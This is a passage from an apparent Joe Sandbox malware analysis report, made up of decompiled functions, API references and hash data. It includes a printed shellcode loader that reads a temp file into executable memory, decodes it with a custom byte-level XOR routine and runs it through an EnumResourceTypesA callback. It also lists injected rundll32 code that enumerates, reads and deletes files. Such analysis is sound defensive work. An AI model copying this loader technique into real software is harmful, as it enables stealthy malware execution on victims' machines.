					goto L8;
				} else {
					goto L9;
				}
			}

0x01578e0f
0x01578e16
0x01578e19
0x01578e1b
0x01578e21
0x01578e7f
0x01578e85
0x015b9354
0x015b936c
0x015b9371
0x015b937b
0x015b9381
0x015b9381
0x015b937b
0x01578e9d
0x01578e9d
0x01578e29
0x01578e2c
0x01578e38
0x01578e3e
0x01578e43
0x01578eb5
0x01578eb9
0x015b92aa
0x015b92af
0x015b92e8
0x015b92e8
0x015b92af
0x01578eb9
0x01578e45
0x01578e53
0x01578e5b
0x01578e5f
0x01578e78
0x01578e78
0x01578e7d
0x01578ec3
0x01578ecd
0x01578ed2
0x01578ed2
0x01578ec5
0x01578ec5
0x00000000
0x01578e7d
0x01578e67
0x01578ea4
0x015b931a
0x00000000
0x00000000
0x015b9320
0x01578ea4
0x01578e70
0x015b9325
0x015b9340
0x015b9345
0x015b9345
0x01578e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01578E53

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 015B9357
LdrpFindDllActivationContext, xrefs: 015B9331, 015B935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015B932A
minkernel\ntdll\ldrsnap.c, xrefs: 015B933B, 015B9367

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: cd15120a7bd251f7f0b1d3d8e38e02ee2f877f747a48dbae4a3bb3d04a52b233
Instruction ID: d83159ea348d06e6e4f643ca7759ff9a9aefc4c314d002fde9ad35a006c2bb4d
Opcode Fuzzy Hash: cd15120a7bd251f7f0b1d3d8e38e02ee2f877f747a48dbae4a3bb3d04a52b233
Instruction Fuzzy Hash: 3E410732A003159EEB36AA5CEC8FB7EB7B4BB45658F054D69ED089F191E7706D808381

Uniqueness

Uniqueness Score: -1.00%

Function 01586DE6 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: fb531fcae491c98fdcb963c828119dcca080fcdf068009c3da26310ce0b04acf
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: 29319A35204205DFCB29DF29C480AABB7E6FF85324B14C95EE45A9F291DB31F802CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A31000 Relevance: 16.6, APIs: 11, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 67%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				WCHAR* _v8;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOW _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t37;
				intOrPtr _t38;
				signed int _t40;
				int _t42;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t52;
				int _t58;
				intOrPtr* _t61;
				intOrPtr _t66;

				_push(0xffffffff);
				_push(0xa3f128);
				_push(0xa3e3cd);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_v28 = _t66 - 0x68;
				_v8 = 0;
				_t58 = 2;
				__set_app_type(_t58);
				 *0xa40080 =  *0xa40080 | 0xffffffff;
				 *0xa40084 =  *0xa40084 | 0xffffffff;
				 *(__p__fmode()) =  *0xa4007c;
				 *(__p__commode()) =  *0xa40078;
				 *0xa40088 = _adjust_fdiv;
				E00A3119A( *_adjust_fdiv);
				if( *0xa40068 == 0) {
					__setusermatherr(E00A31197);
				}
				E00A31185();
				L00A3E3C7();
				_v112 =  *0xa40074;
				__imp____wgetmainargs( &_v100,  &_v116,  &_v104,  *0xa40070,  &_v112, 0xa40008, 0xa4000c);
				_push(0xa40004);
				_push(0xa40000);
				L00A3E3C7();
				_t37 = __imp___wcmdln;
				_t61 =  *_t37;
				if(_t61 != 0) {
					_v120 = _t61;
					if( *_t61 != 0x22) {
						while( *_t61 > 0x20) {
							_t61 = _t61 + _t58;
							_v120 = _t61;
						}
					} else {
						do {
							_t61 = _t61 + _t58;
							_v120 = _t61;
							_t44 =  *_t61;
						} while (_t44 != 0 && _t44 != 0x22);
						if( *_t61 == 0x22) {
							L8:
							_t61 = _t61 + _t58;
							_v120 = _t61;
						}
					}
					_t38 =  *_t61;
					if(_t38 != 0 && _t38 <= 0x20) {
						goto L8;
					}
					_v96.dwFlags = 0;
					GetStartupInfoW( &_v96);
					if((_v96.dwFlags & 0x00000001) == 0) {
						_t40 = 0xa;
					} else {
						_t40 = _v96.wShowWindow & 0x0000ffff;
					}
					_push(_t40);
					_push(_t61);
					_push(0);
					_push(GetModuleHandleW(0));
					_t42 = E00A311C0();
					_v108 = _t42;
					exit(_t42);
					_t43 = _v24;
					_t52 =  *((intOrPtr*)( *_t43));
					_v124 = _t52;
					_push(_t43);
					_push(_t52);
					L00A3E3C1();
					return _t43;
				} else {
					_v8 = _v8 | 0xffffffff;
					 *[fs:0x0] = _v20;
					return _t37;
				}
			}

APIs

__set_app_type.MSVCRT ref: 00A3102F
__p__fmode.MSVCRT ref: 00A31044
__p__commode.MSVCRT ref: 00A31052
__setusermatherr.MSVCRT ref: 00A3107E
_initterm.MSVCRT ref: 00A31094
__wgetmainargs.MSVCRT ref: 00A310B7
_initterm.MSVCRT ref: 00A310C7
GetStartupInfoW.KERNEL32(?), ref: 00A31129
GetModuleHandleW.KERNEL32(00000000,00000000,?,0000000A), ref: 00A3114F
exit.MSVCRT ref: 00A3115F
_XcptFilter.MSVCRT ref: 00A31171

Memory Dump Source

Source File: 00000002.00000002.347771641.0000000000A31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000002.00000002.347688396.0000000000A30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.347910141.0000000000A3F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.347918852.0000000000A41000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a30000_sphybwtjm.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargsexit
String ID:
API String ID: 3327129161-0
Opcode ID: 0a62b5dfc76c48fc9d6a88fa53b5ced3999ddea57fbccde1afe87c59e16c8719
Instruction ID: 48d902e6b337141a964bcc9167ad1866eb7dd078fa5d7a927a33ee21f9a244b7
Opcode Fuzzy Hash: 0a62b5dfc76c48fc9d6a88fa53b5ced3999ddea57fbccde1afe87c59e16c8719
Instruction Fuzzy Hash: 0D414BBAD00204EFCB24DFE8ED45AA9BBB8FB85710F10462EFA1597291E7744842DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A311C0 Relevance: 13.7, APIs: 9, Instructions: 187
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A311C0() {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				_Unknown_base(*)()* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				short _v600;
				intOrPtr _t105;

				_v76 =  *0xa40010;
				_v72 =  *0xa40014;
				_v68 =  *0xa40018;
				_v64 =  *0xa4001c;
				_v60 =  *0xa40020;
				_v56 =  *0xa40024;
				_v12 = 0;
				_v16 = E00A311A0();
				_v36 = GetProcAddress(_v16, 0xa40028);
				_v52 = GetProcAddress(_v16, 0xa40034);
				_v48 = GetProcAddress(_v16, 0xa40040);
				_v44 = GetProcAddress(_v16, 0xa40050);
				_v40 = GetProcAddress(_v16, 0xa4005c);
				_v24 = 0;
				_v24 = malloc(0x2625a00);
				memset(_v24, 0xff, 0x2625a00);
				if(_v24 != 0) {
					if(GetTempPathW(0x103,  &_v600) != 0) {
						_push( &_v76);
						_push( &_v600);
						if(_v36() != 0) {
							_t105 = _v40( &_v600, 0x80000000, 1, 0, 3, 0x80, 0);
							_v28 = _t105;
							if(_v28 != 0xffffffff) {
								_v32 = _v44(_v28, 0);
								_v20 = _v48(0, _v32, 0x3000, 0x40);
								_t105 = _v52(_v28, _v20, _v32,  &_v80, 0);
								if(_t105 != 0) {
									_v12 = 0;
									while(_v12 < _v32) {
										_v5 =  *((intOrPtr*)(_v20 + _v12));
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ 0x000000b0;
										_v5 = (_v5 & 0x000000ff) - 8;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ _v12;
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 = _v5 & 0x000000ff ^ 0x00000010;
										_v5 =  ~(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - 0xfa;
										_v5 = _v5 & 0x000000ff ^ _v12;
										_v5 = (_v5 & 0x000000ff) - 0x7a;
										_v5 =  !(_v5 & 0x000000ff);
										 *((char*)(_v20 + _v12)) = _v5;
										_v12 = _v12 + 1;
									}
									return  !(EnumResourceTypesA(0, _v20, 0)) - 0x0000eef9 ^ 0x00014df3;
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					} else {
						goto L15;
					}
				} else {
					_t105 = 0;
					L15:
					return _t105;
				}
			}

0x00a311cf
0x00a311d8
0x00a311e1
0x00a311e9
0x00a311f2
0x00a311fb
0x00a311fe
0x00a3120a
0x00a3121c
0x00a3122e
0x00a31240
0x00a31252
0x00a31264
0x00a31267
0x00a3127b
0x00a3128c
0x00a31298
0x00a312b5
0x00a312bf
0x00a312c6
0x00a312cc
0x00a312ec
0x00a312ef
0x00a312f6
0x00a31306
0x00a31319
0x00a3132e
0x00a31333
0x00a3133a
0x00a3134c
0x00a31360
0x00a3136a
0x00a31373
0x00a31380
0x00a3138a
0x00a31393
0x00a3139d
0x00a313a6
0x00a313b0
0x00a313ba
0x00a313c4
0x00a313cd
0x00a313da
0x00a313e4
0x00a313ee
0x00a313f7
0x00a31403
0x00a31349
0x00a31349
0x00a31424
0x00a31335
0x00000000
0x00a31335
0x00a312f8
0x00000000
0x00a312f8
0x00a312ce
0x00000000
0x00a312ce
0x00a312b7
0x00000000
0x00a312b7
0x00a3129a
0x00a3129a
0x00a3e3ae
0x00a3e3b2
0x00a3e3b2

APIs

GetProcAddress.KERNEL32(00000000,00A40028), ref: 00A31216
GetProcAddress.KERNEL32(00000000,00A40034), ref: 00A31228
GetProcAddress.KERNEL32(00000000,00A40040), ref: 00A3123A
GetProcAddress.KERNEL32(00000000,00A40050), ref: 00A3124C
GetProcAddress.KERNEL32(00000000,00A4005C), ref: 00A3125E
malloc.MSVCRT ref: 00A31273
memset.MSVCRT ref: 00A3128C
GetTempPathW.KERNEL32(00000103,?), ref: 00A312AD

Memory Dump Source

Source File: 00000002.00000002.347771641.0000000000A31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000002.00000002.347688396.0000000000A30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.347910141.0000000000A3F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.347918852.0000000000A41000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a30000_sphybwtjm.jbxd

Similarity

API ID: AddressProc$PathTempmallocmemset
String ID:
API String ID: 3927944005-0
Opcode ID: 3597339d67147d5938f07ddfd34588280950f56c352aeade7b3d0d3e87a51bf1
Instruction ID: c1886e2c092efa1b9ff0dafa3b67efca514c87651798caea325fa59240ede593
Opcode Fuzzy Hash: 3597339d67147d5938f07ddfd34588280950f56c352aeade7b3d0d3e87a51bf1
Instruction Fuzzy Hash: C8818D78D08288AFDB00CBE9D890BEEBFB4AF59301F008099E591B7281D635564ADB20

Uniqueness

Uniqueness Score: -1.00%

Function 0157645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0157645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x163d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0158FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E01562280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E0155FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x163b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0158B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x0157645b
0x01576463
0x0157646d
0x01576475
0x0157647a
0x0157647e
0x01576480
0x0157648c
0x01576490
0x01576495
0x01576498
0x0157649b
0x0157649f
0x015764a1
0x015b7c07
0x015b7c09
0x015b7c0c
0x00000000
0x015764a7
0x015764a7
0x015764aa
0x015b7bf7
0x015b7c00
0x00000000
0x015b7bf9
0x015b7bf9
0x015b7bf9
0x015764b0
0x015764b0
0x015764b2
0x015764b2
0x015764b3
0x015764ba
0x01576553
0x0157655e
0x01576566
0x0157656c
0x01576575
0x0157657f
0x01576585
0x01576588
0x01576588
0x015764c7
0x015764cb
0x015764ce
0x015764d3
0x015764da
0x015764e5
0x015764ed
0x015764f1
0x015764f5
0x015764f6
0x015764fa
0x01576502
0x01576503
0x01576504
0x01576507
0x0157651a
0x01576524
0x01576524
0x01576526
0x01576526
0x015764aa
0x0157652c
0x0157652d
0x0157652e
0x01576539

APIs

RtlDebugPrintTimes.NTDLL ref: 0157651A

Strings

0, xrefs: 015764FA
0, xrefs: 015764E5

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: b9c3e87cf4efe1f63f54c27257a7471f8f0172297c2b4b06e2b81a5b1cbf195b
Instruction ID: dbe10a03a05c2d0a668ae333b4afbba42912fbd71c24fbb6438a7c3cad70e41e
Opcode Fuzzy Hash: b9c3e87cf4efe1f63f54c27257a7471f8f0172297c2b4b06e2b81a5b1cbf195b
Instruction Fuzzy Hash: 67415BB1604B069FD311CF28D485A5ABBE5BB8D714F044A6EF988DB341D731EA05CF86

Uniqueness

Uniqueness Score: -1.00%

Function 015DFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E015DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0158CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E015D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E015D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x015dfdda
0x015dfde2
0x015dfde5
0x015dfdec
0x015dfdfa
0x015dfdff
0x015dfe0a
0x015dfe0f
0x015dfe17
0x015dfe1e
0x015dfe19
0x015dfe19
0x015dfe19
0x015dfe20
0x015dfe21
0x015dfe22
0x015dfe25
0x015dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015DFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015DFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015DFE2B

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 23e19d306e63ebb90270a01f344e7b7daaf22fbaf353ca77c382a71038f0c162
Instruction ID: 3ddeb62242954892410f6ab480d75919dc05b80ec1d8dc2722912bd002de29ce
Opcode Fuzzy Hash: 23e19d306e63ebb90270a01f344e7b7daaf22fbaf353ca77c382a71038f0c162
Instruction Fuzzy Hash: FCF0F632200602BFE6341A49DC02F23BF6AFB84B70F254315F6285E1D1EA62F82087F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5008, Parent PID: 3320COMMON

Executed Functions

Function 003E2C7A Relevance: 4.6, APIs: 3, Instructions: 104fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 003E2D4F
FindNextFileW.KERNELBASE(?,00000010), ref: 003E2D8E
FindClose.KERNEL32(?), ref: 003E2D99

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 84453c5fab833b4a17196ea39a243d0c9c1001978eb271748edb3957c88d9e63
Instruction ID: 8a4b339ead07f8f21781c320ebfd37dc078a7f6e57f4e4a2452cfdbfce08fe15
Opcode Fuzzy Hash: 84453c5fab833b4a17196ea39a243d0c9c1001978eb271748edb3957c88d9e63
Instruction Fuzzy Hash: 26319671900398BBDB21DF65CC85FEF777CAF44705F144698BA19A71C1E6B0AA848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E2C80 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 003E2D4F
FindNextFileW.KERNELBASE(?,00000010), ref: 003E2D8E
FindClose.KERNEL32(?), ref: 003E2D99

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 54d9d22608e3cb54b422156448dea92d25729d54213f47d51aebee3893a091e0
Instruction ID: 00d8ffc42ee015541b92ec625710f53043808b6397a6d94a36c017c0b9bee0c5
Opcode Fuzzy Hash: 54d9d22608e3cb54b422156448dea92d25729d54213f47d51aebee3893a091e0
Instruction Fuzzy Hash: 3531A671900358BBDB21DF66CC85FEF777CAF44705F144598BA19A71C0E7B0AA848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EC7EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(003E7260,003E2530,FFFFFFFF,003E6D4A,00000206,?,`r>,00000206,003E6D4A,FFFFFFFF,003E2530,003E7260,00000206,00000000), ref: 003EC835

Strings

`r>, xrefs: 003EC812, 003EC820

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: `r>
API String ID: 2738559852-1811813613
Opcode ID: 6172ca1b0066a1019d99bfe171e312b1186d4c5125009000075a894d72bd18a1
Instruction ID: 0283ff11d692e76c42e2555afc013b546ec01ddc107069a91d9018cea12bebed
Opcode Fuzzy Hash: 6172ca1b0066a1019d99bfe171e312b1186d4c5125009000075a894d72bd18a1
Instruction Fuzzy Hash: 0B0128B6200108AFCB14DF99EC84DEB77A9EF8C354F118259FA4E97241C631E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EC7F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(003E7260,003E2530,FFFFFFFF,003E6D4A,00000206,?,`r>,00000206,003E6D4A,FFFFFFFF,003E2530,003E7260,00000206,00000000), ref: 003EC835

Strings

`r>, xrefs: 003EC812, 003EC820

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: `r>
API String ID: 2738559852-1811813613
Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction ID: 3d01dd7e40d8cad7b55d1ee93abbb21d926a6bf122dc5fbb5135de18eed8141b
Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction Fuzzy Hash: 36F0A4B6200108ABCB14DF89DC85EEB77ADAF8C754F118248BA0D97241D630E811CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003EC83A Relevance: 3.0, APIs: 2, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(003E7260,003E2530,FFFFFFFF,003E6D4A,00000206,?,`r>,00000206,003E6D4A,FFFFFFFF,003E2530,003E7260,00000206,00000000), ref: 003EC835
NtDeleteFile.NTDLL(003E7062,00000206,?,003E7062,00000005,00000018,?,?,00000000,00000206,?), ref: 003EC865

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: File$DeleteRead
String ID:
API String ID: 143354817-0
Opcode ID: 789855b703e30f50353c8aa300fd767f70c7ae11b847b7e759a1f4b0c273b8ec
Instruction ID: 9b7691fc11f3ce0f649e427062f7d5fd8c8c2e47d848043c7943657328aae7b4
Opcode Fuzzy Hash: 789855b703e30f50353c8aa300fd767f70c7ae11b847b7e759a1f4b0c273b8ec
Instruction Fuzzy Hash: 1FF0E5362001587FD720EBA4EC89EEB7B68EF85360F144659F98DAB241C132E5018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 003EC740 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,003E709C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,003E709C,00000000,00000005,00000060,00000000,00000000), ref: 003EC78D

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction ID: 4d0aaaf6e6db7e70e2e89e686c082a4ef3e7c0e356bc79ac66b294315b823722
Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction Fuzzy Hash: 07F0B2B2200208ABCB18CF89DC85EDB37ADAF8C754F018208BA0997241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003EC91A Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003EC959

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9797c324f6c1ca053dbdf86fed1d9aa0e825096e00b79ee88111d8656a017d06
Instruction ID: c0068f3d6b8159a2ea3e45a280d5080d39cd8e912569e3aa5b299dd4ed3a1dd8
Opcode Fuzzy Hash: 9797c324f6c1ca053dbdf86fed1d9aa0e825096e00b79ee88111d8656a017d06
Instruction Fuzzy Hash: 98F05EB1200104ABCB14DF99DC81EDB3B68EF8C350F118209FE0997251DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EC920 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003EC959

Memory Dump Source

